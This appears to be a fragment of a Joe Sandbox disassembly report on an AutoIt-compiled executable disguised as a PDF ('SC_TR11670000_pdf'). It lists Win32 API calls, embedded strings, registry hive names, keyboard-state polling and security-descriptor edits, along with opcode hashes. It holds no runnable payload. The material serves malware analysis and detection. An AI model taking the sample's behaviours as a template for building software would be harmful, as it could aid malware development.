                                                                          • Instruction ID: 69a3ca33d557904a1ab875a821d04385ca68417b06b04a796471e80a55b0525f
                                                                          • Opcode Fuzzy Hash: a104e43c4c627946a5660f0977ef7a610379c813b039bf4b1f53bbf7b22fa7c7
                                                                          • Instruction Fuzzy Hash: EB719A71140245AFDB20CF28DC49F6A7BE9FB89700F08456DF995972A0DBB8E912CF12
                                                                          APIs
                                                                            • Part of subcall function 00AE2612: GetWindowLongW.USER32(?,000000EB), ref: 00AE2623
                                                                          • DragQueryPoint.SHELL32(?,?), ref: 00B6C917
                                                                            • Part of subcall function 00B6ADF1: ClientToScreen.USER32(?,?), ref: 00B6AE1A
                                                                            • Part of subcall function 00B6ADF1: GetWindowRect.USER32(?,?), ref: 00B6AE90
                                                                            • Part of subcall function 00B6ADF1: PtInRect.USER32(?,?,00B6C304), ref: 00B6AEA0
                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00B6C980
                                                                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00B6C98B
                                                                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00B6C9AE
                                                                          • _wcscat.LIBCMT ref: 00B6C9DE
                                                                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00B6C9F5
                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00B6CA0E
                                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00B6CA25
                                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00B6CA47
                                                                          • DragFinish.SHELL32(?), ref: 00B6CA4E
                                                                          • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00B6CB41
                                                                          Similarity
                                                                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                          • API String ID: 169749273-3440237614
                                                                          • Opcode ID: 0bbed2dcb85c3ebe8d7116d51199d7afc98ea5055b4c765c260e2e332b2b2947
                                                                          • Instruction ID: 8f86222eaedc501579f2d4c2aa0083c2736b73200db6206b9f2676d70f6b2f93
                                                                          • Opcode Fuzzy Hash: 0bbed2dcb85c3ebe8d7116d51199d7afc98ea5055b4c765c260e2e332b2b2947
                                                                          • Instruction Fuzzy Hash: 9E619A71108341AFC701DF64DC85DAFBBE8EF89350F000A6EF5A5932A1DB749A09CB62
                                                                          APIs
                                                                          • CharUpperBuffW.USER32(?,?), ref: 00B646AB
                                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00B646F6
                                                                          Similarity
                                                                          • API ID: BuffCharMessageSendUpper
                                                                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                          • API String ID: 3974292440-4258414348
                                                                          • Opcode ID: cc7939fbf4bf8448b4f7a4a1f7e5a138b5b56b0ac41a767764da31c12bcaa1be
                                                                          • Instruction ID: 751f954c144d0096cee3441800f2bb72c02ea3e158881917321f3d5e074a7199
                                                                          • Opcode Fuzzy Hash: cc7939fbf4bf8448b4f7a4a1f7e5a138b5b56b0ac41a767764da31c12bcaa1be
                                                                          • Instruction Fuzzy Hash: E7918F342047419FCB14EF21C591A6ABBE1EF95354F1448ECF8965B3A2CB34ED4ACB91
                                                                          APIs
                                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00B6BB6E
                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00B66D80,?), ref: 00B6BBCA
                                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00B6BC03
                                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00B6BC46
                                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00B6BC7D
                                                                          • FreeLibrary.KERNEL32(?), ref: 00B6BC89
                                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00B6BC99
                                                                          • DestroyIcon.USER32(?), ref: 00B6BCA8
                                                                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00B6BCC5
                                                                          • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00B6BCD1
                                                                            • Part of subcall function 00B0313D: __wcsicmp_l.LIBCMT ref: 00B031C6
                                                                          Similarity
                                                                          • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                          • String ID: .dll$.exe$.icl
                                                                          • API String ID: 1212759294-1154884017
                                                                          • Opcode ID: 93aad7d21dcd35898aa2cf59ecb0991d4a32df7d5d2f8ea5ad7728d6a2097096
                                                                          • Instruction ID: a3f45355a94fbc4a872cfbd57e5fe4b306153fffde6a7c849ebf0e9f60b817c9
                                                                          • Opcode Fuzzy Hash: 93aad7d21dcd35898aa2cf59ecb0991d4a32df7d5d2f8ea5ad7728d6a2097096
                                                                          • Instruction Fuzzy Hash: 7A61B071900219BEEB14DF64DC85FBA7BF8FB08710F104195F915D61D1DBB89A90DBA0
                                                                          APIs
                                                                            • Part of subcall function 00AE9997: __itow.LIBCMT ref: 00AE99C2
                                                                            • Part of subcall function 00AE9997: __swprintf.LIBCMT ref: 00AE9A0C
                                                                          • CharLowerBuffW.USER32(?,?), ref: 00B4A636
                                                                          • GetDriveTypeW.KERNEL32 ref: 00B4A683
                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B4A6CB
                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B4A702
                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B4A730
                                                                            • Part of subcall function 00AE7D2C: _memmove.LIBCMT ref: 00AE7D66
                                                                          Similarity
                                                                          • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                          • API String ID: 2698844021-4113822522
                                                                          • Opcode ID: fbe9725389305ed4eafe855dfc4da43d7ec648a237fd09de3cb562d08cb6d6c1
                                                                          • Instruction ID: 818a88809957b249a698596b7c9a458c1f87015bcf82531534f1fdc55a499d1a
                                                                          • Opcode Fuzzy Hash: fbe9725389305ed4eafe855dfc4da43d7ec648a237fd09de3cb562d08cb6d6c1
                                                                          • Instruction Fuzzy Hash: BB518C711083459FC700EF25C99186AB7F8FF98758F0449ACF896572A1DB31EE0ACB92
                                                                          APIs
                                                                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00B4A47A
                                                                          • __swprintf.LIBCMT ref: 00B4A49C
                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00B4A4D9
                                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00B4A4FE
                                                                          • _memset.LIBCMT ref: 00B4A51D
                                                                          • _wcsncpy.LIBCMT ref: 00B4A559
                                                                          • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00B4A58E
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00B4A599
                                                                          • RemoveDirectoryW.KERNEL32(?), ref: 00B4A5A2
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00B4A5AC
                                                                          Similarity
                                                                          • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                          • String ID: :$\$\??\%s
                                                                          • API String ID: 2733774712-3457252023
                                                                          • Opcode ID: 229c3055cd58c54a5984cd9ca2e9489667cacde4b3af807d6b9fba97c5debbda
                                                                          • Instruction ID: 338336a1464624ec881ac45dbb7d0edc07ba2a853f8b144fd10170aa382c1a3d
                                                                          • Opcode Fuzzy Hash: 229c3055cd58c54a5984cd9ca2e9489667cacde4b3af807d6b9fba97c5debbda
                                                                          • Instruction Fuzzy Hash: 87318FB554010AAADB219FA0DC49FAB77BCEF88701F1041F6F908D61A0EBB497448B25
                                                                          APIs
                                                                          Similarity
                                                                          • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                                                          • String ID:
                                                                          • API String ID: 884005220-0
                                                                          • Opcode ID: 0ee2494cff6a05e0bdf0ede04d1f3a40264c63c74e5f2577c7fac0ac3e89589c
                                                                          • Instruction ID: 9ba839d13b2a7400e39392b8746783392cc7d8132d5fc1fd19ba09db03823238
                                                                          • Opcode Fuzzy Hash: 0ee2494cff6a05e0bdf0ede04d1f3a40264c63c74e5f2577c7fac0ac3e89589c
                                                                          • Instruction Fuzzy Hash: 36611772506301AFDB205F24EC42BAA7BE9EF51721F9042E9E8019B1D1DB74EDC1C792
APIs
  • Part of subcall function 00AE2612: GetWindowLongW.USER32(?,000000EB), ref: 00AE2623
• PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00B6C4EC
• GetFocus.USER32 ref: 00B6C4FC
• GetDlgCtrlID.USER32(00000000), ref: 00B6C507
• _memset.LIBCMT ref: 00B6C632
• GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00B6C65D
• GetMenuItemCount.USER32(?), ref: 00B6C67D
• GetMenuItemID.USER32(?,00000000), ref: 00B6C690
• GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00B6C6C4
• GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00B6C70C
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00B6C744
• DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00B6C779
Strings
Memory Dump Source
• Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
Similarity
• API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
• String ID: 0
• API String ID: 1296962147-4108050209
• Opcode ID: 86e23280da42a4bcf98f75bd43308d4cda9725dbe1b3b900a1799e51165bd8cf
• Instruction ID: 57eaecab4337dca3b08af0d58fb0ae31f99d792c1942269012a548ecd407b430
• Opcode Fuzzy Hash: 86e23280da42a4bcf98f75bd43308d4cda9725dbe1b3b900a1799e51165bd8cf
• Instruction Fuzzy Hash: A0818D712083019FD710CF24D985A7BBBE8FB98314F1045AEF99697291DB78DD05CBA2
APIs
  • Part of subcall function 00B3874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B38766
  • Part of subcall function 00B3874A: GetLastError.KERNEL32(?,00B3822A,?,?,?), ref: 00B38770
  • Part of subcall function 00B3874A: GetProcessHeap.KERNEL32(00000008,?,?,00B3822A,?,?,?), ref: 00B3877F
  • Part of subcall function 00B3874A: HeapAlloc.KERNEL32(00000000,?,00B3822A,?,?,?), ref: 00B38786
  • Part of subcall function 00B3874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B3879D
  • Part of subcall function 00B387E7: GetProcessHeap.KERNEL32(00000008,00B38240,00000000,00000000,?,00B38240,?), ref: 00B387F3
  • Part of subcall function 00B387E7: HeapAlloc.KERNEL32(00000000,?,00B38240,?), ref: 00B387FA
  • Part of subcall function 00B387E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00B38240,?), ref: 00B3880B
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00B38458
• _memset.LIBCMT ref: 00B3846D
• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00B3848C
• GetLengthSid.ADVAPI32(?), ref: 00B3849D
• GetAce.ADVAPI32(?,00000000,?), ref: 00B384DA
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00B384F6
• GetLengthSid.ADVAPI32(?), ref: 00B38513
• GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00B38522
• HeapAlloc.KERNEL32(00000000), ref: 00B38529
• GetLengthSid.ADVAPI32(?,00000008,?), ref: 00B3854A
• CopySid.ADVAPI32(00000000), ref: 00B38551
• AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00B38582
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00B385A8
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 00B385BC
Memory Dump Source
• Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
Similarity
• API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
• String ID:
• API String ID: 3996160137-0
• Opcode ID: 51ced4be23ec7c33e7195457788d5e83b2fe60b6a1653e0a471e782c9487fe1d
• Instruction ID: 46d01044c4688ec94a68d460ea3c8e420f53af304216ac5867fece7dca92be30
• Opcode Fuzzy Hash: 51ced4be23ec7c33e7195457788d5e83b2fe60b6a1653e0a471e782c9487fe1d
• Instruction Fuzzy Hash: 6C61567190020AEBDF01DFA5EC45AAEBBB9FF04300F2481A9F915A7291DF759A04CF61
APIs
• GetDC.USER32(00000000), ref: 00B576A2
• CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00B576AE
• CreateCompatibleDC.GDI32(?), ref: 00B576BA
• SelectObject.GDI32(00000000,?), ref: 00B576C7
• StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00B5771B
• GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00B57757
• GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00B5777B
• SelectObject.GDI32(00000006,?), ref: 00B57783
• DeleteObject.GDI32(?), ref: 00B5778C
• DeleteDC.GDI32(00000006), ref: 00B57793
• ReleaseDC.USER32(00000000,?), ref: 00B5779E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
Similarity
• API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
• String ID: (
• API String ID: 2598888154-3887548279
• Opcode ID: 8f05c94a4986620241facfee7da533e122406e2f586a241c9e98207bb012be10
• Instruction ID: 653d1bf1a5bd82e94d5c7927714e1fb737aa8e8e0151a0b487a822548d6d3e06
• Opcode Fuzzy Hash: 8f05c94a4986620241facfee7da533e122406e2f586a241c9e98207bb012be10
• Instruction Fuzzy Hash: 87515875A04209EFCB15CFA8EC84EAEBBF9EF48310F148469E94997250DA75A844CB60
APIs
• LoadStringW.USER32(00000066,?,00000FFF,00B6FB78), ref: 00B4A0FC
  • Part of subcall function 00AE7F41: _memmove.LIBCMT ref: 00AE7F82
• LoadStringW.USER32(?,?,00000FFF,?), ref: 00B4A11E
• __swprintf.LIBCMT ref: 00B4A177
• __swprintf.LIBCMT ref: 00B4A190
• _wprintf.LIBCMT ref: 00B4A246
• _wprintf.LIBCMT ref: 00B4A264
Strings
Memory Dump Source
• Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
Similarity
• API ID: LoadString__swprintf_wprintf$_memmove
• String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
• API String ID: 311963372-2391861430
• Opcode ID: dc2a504c7304f1deaf1a4be5b1258bac54c8beb28c6aabe2e17f6b0643b28e8f
• Instruction ID: 93d2acd1e97d0a1290eed03e0407528e003b5790a00cb6fbee6d9733262ca7ad
• Opcode Fuzzy Hash: dc2a504c7304f1deaf1a4be5b1258bac54c8beb28c6aabe2e17f6b0643b28e8f
• Instruction Fuzzy Hash: FA518D7190024AAACF15EBE0CE86EEEB7B8EF04300F2441A5F505730A1EB716F58DB61
APIs
  • Part of subcall function 00B00B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00AE6C6C,?,00008000), ref: 00B00BB7
  • Part of subcall function 00AE48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AE48A1,?,?,00AE37C0,?), ref: 00AE48CE
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00AE6D0D
• SetCurrentDirectoryW.KERNEL32(?), ref: 00AE6E5A
  • Part of subcall function 00AE59CD: _wcscpy.LIBCMT ref: 00AE5A05
  • Part of subcall function 00B0387D: _iswctype.LIBCMT ref: 00B03885
Strings
Memory Dump Source
• Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
Similarity
• API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
• String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
• API String ID: 537147316-1018226102
• Opcode ID: 416d61a8eb105dba041d0c819c1e2b2d17344b00a41ae66364d0de2efa32f7ed
• Instruction ID: 3308e4a40d3f0e281909afb88885722cd6bec210d5db53f0a28ecc8fc415ca11
• Opcode Fuzzy Hash: 416d61a8eb105dba041d0c819c1e2b2d17344b00a41ae66364d0de2efa32f7ed
• Instruction Fuzzy Hash: 9F02CE305083819FC724EF25C981AAFBBE5FF98354F54096DF896972A1DB30D989CB42
APIs
• _memset.LIBCMT ref: 00AE45F9
• GetMenuItemCount.USER32(00BA6890), ref: 00B1D7CD
• GetMenuItemCount.USER32(00BA6890), ref: 00B1D87D
• GetCursorPos.USER32(?), ref: 00B1D8C1
• SetForegroundWindow.USER32(00000000), ref: 00B1D8CA
• TrackPopupMenuEx.USER32(00BA6890,00000000,?,00000000,00000000,00000000), ref: 00B1D8DD
• PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00B1D8E9
Memory Dump Source
• Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
Similarity
• API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
• String ID:
• API String ID: 2751501086-0
• Opcode ID: 9666ebae6ad38066ad1cd6f0987f182c17d513dcbe86f0112bfdbc522cd056ed
• Instruction ID: af318184815dcbb1c065a4341543fcbb0540924e9d6dc209e9ddbf1c36333128
• Opcode Fuzzy Hash: 9666ebae6ad38066ad1cd6f0987f182c17d513dcbe86f0112bfdbc522cd056ed
• Instruction Fuzzy Hash: B5712570600246BEEB219F15DC89FEABFA8FF05368F200256F515A61E0CBB15C50DB94
APIs
• CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B60038,?,?), ref: 00B610BC
Strings
Memory Dump Source
• Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
Similarity
• API ID: BuffCharUpper
• String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
• API String ID: 3964851224-909552448
• Opcode ID: 54e89b3379a147e83966a4ce23a40bf368874393d2e3174ac493a53353d6c177
• Instruction ID: 28701e910e88c46e48df02b0017a4dacc803137b489462ad2d6292fe720971ef
• Opcode Fuzzy Hash: 54e89b3379a147e83966a4ce23a40bf368874393d2e3174ac493a53353d6c177
• Instruction Fuzzy Hash: DE41713112424A9BCF10EF94ED91AEE37A4FF26340F1449E4FD916B291DB34AD1AC760
APIs
  • Part of subcall function 00AE7D2C: _memmove.LIBCMT ref: 00AE7D66
  • Part of subcall function 00AE7A84: _memmove.LIBCMT ref: 00AE7B0D
• mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00B455D2
• mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00B455E8
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B455F9
• mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00B4560B
• mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00B4561C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
Similarity
• API ID: SendString$_memmove
• String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
• API String ID: 2279737902-1007645807
• Opcode ID: 3c80cf7854d7d8bfaf18c691972dc0990deeb5fbc49981e2755a4fc64ebd93be
• Instruction ID: 50cc65b741b8e860920af01639df4eb03b5253a27f087f50f771e1a26f09f482
• Opcode Fuzzy Hash: 3c80cf7854d7d8bfaf18c691972dc0990deeb5fbc49981e2755a4fc64ebd93be
• Instruction Fuzzy Hash: E51194209545A97ADB20B762DC9ADFF7BBCEF95B40F4004B9B405A30E2DEA01E05C5E5
                                                                          APIs
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                          • String ID: 0.0.0.0
                                                                          APIs
                                                                          • timeGetTime.WINMM ref: 00B4521C
                                                                            • Part of subcall function 00B00719: timeGetTime.WINMM(?,75C0B400,00AF0FF9), ref: 00B0071D
                                                                          • Sleep.KERNEL32(0000000A), ref: 00B45248
                                                                          • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 00B4526C
                                                                          • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00B4528E
                                                                          • SetActiveWindow.USER32 ref: 00B452AD
                                                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00B452BB
                                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00B452DA
                                                                          • Sleep.KERNEL32(000000FA), ref: 00B452E5
                                                                          • IsWindow.USER32 ref: 00B452F1
                                                                          • EndDialog.USER32(00000000), ref: 00B45302
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                          • String ID: BUTTON
                                                                          APIs
                                                                            • Part of subcall function 00AE9997: __itow.LIBCMT ref: 00AE99C2
                                                                            • Part of subcall function 00AE9997: __swprintf.LIBCMT ref: 00AE9A0C
                                                                          • CoInitialize.OLE32(00000000), ref: 00B4D855
                                                                          • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00B4D8E8
                                                                          • SHGetDesktopFolder.SHELL32(?), ref: 00B4D8FC
                                                                          • CoCreateInstance.OLE32(00B72D7C,00000000,00000001,00B9A89C,?), ref: 00B4D948
                                                                          • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00B4D9B7
                                                                          • CoTaskMemFree.OLE32(?,?), ref: 00B4DA0F
                                                                          • _memset.LIBCMT ref: 00B4DA4C
                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 00B4DA88
                                                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00B4DAAB
                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00B4DAB2
                                                                          • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00B4DAE9
                                                                          • CoUninitialize.OLE32(00000001,00000000), ref: 00B4DAEB
                                                                          Similarity
                                                                          • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                          • String ID:
                                                                          APIs
                                                                          • GetKeyboardState.USER32(?), ref: 00B405A7
                                                                          • SetKeyboardState.USER32(?), ref: 00B40612
                                                                          • GetAsyncKeyState.USER32(000000A0), ref: 00B40632
                                                                          • GetKeyState.USER32(000000A0), ref: 00B40649
                                                                          • GetAsyncKeyState.USER32(000000A1), ref: 00B40678
                                                                          • GetKeyState.USER32(000000A1), ref: 00B40689
                                                                          • GetAsyncKeyState.USER32(00000011), ref: 00B406B5
                                                                          • GetKeyState.USER32(00000011), ref: 00B406C3
                                                                          • GetAsyncKeyState.USER32(00000012), ref: 00B406EC
                                                                          • GetKeyState.USER32(00000012), ref: 00B406FA
                                                                          • GetAsyncKeyState.USER32(0000005B), ref: 00B40723
                                                                          • GetKeyState.USER32(0000005B), ref: 00B40731
                                                                          Similarity
                                                                          • API ID: State$Async$Keyboard
                                                                          • String ID:
                                                                          APIs
                                                                          • GetDlgItem.USER32(?,00000001), ref: 00B3C746
                                                                          • GetWindowRect.USER32(00000000,?), ref: 00B3C758
                                                                          • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00B3C7B6
                                                                          • GetDlgItem.USER32(?,00000002), ref: 00B3C7C1
                                                                          • GetWindowRect.USER32(00000000,?), ref: 00B3C7D3
                                                                          • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00B3C827
                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00B3C835
                                                                          • GetWindowRect.USER32(00000000,?), ref: 00B3C846
                                                                          • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00B3C889
                                                                          • GetDlgItem.USER32(?,000003EA), ref: 00B3C897
